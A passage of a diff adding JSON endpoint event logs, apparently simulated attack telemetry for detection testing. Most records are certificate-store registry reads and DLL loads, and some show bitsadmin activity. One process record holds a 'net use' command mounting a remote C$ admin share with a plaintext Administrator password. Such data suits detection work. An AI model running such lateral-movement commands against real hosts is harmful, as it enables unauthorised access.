"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ncryptsslp.dll", + "image_path": "C:\\Windows\\System32\\ncryptsslp.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570904180000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "mpr.dll", + "image_path": "C:\\Windows\\System32\\mpr.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570905270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "dpapi.dll", + "image_path": "C:\\Windows\\System32\\dpapi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570905119984, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "file", + "file_name": "BIT6BFA.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\BIT6BFA.tmp", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570905580000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883570905580000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570906360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "process", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "subtype": "terminate", + "timestamp": 131883570906360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "process", + "pid": 2108, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570906520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" + }, + { + "event_type": "file", + "file_name": "BITSADMIN.EXE-80E1BDAA.pf", + "file_path": "C:\\Windows\\Prefetch\\BITSADMIN.EXE-80E1BDAA.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570906520000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4924, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570906590000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4924, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570906520000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4924, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570906520000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4924, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570906520000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4924, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570906520000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4924, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570906520000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" + }, + { + "event_type": "process", + "pid": 4924, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570906520000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"cmd.exe /c \" net use \\\\Target\\C$ P@ssw0rd1 /u:DOMAIN\\Administrator", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2260, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570909009984, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" + }, + { + "event_type": "image_load", + 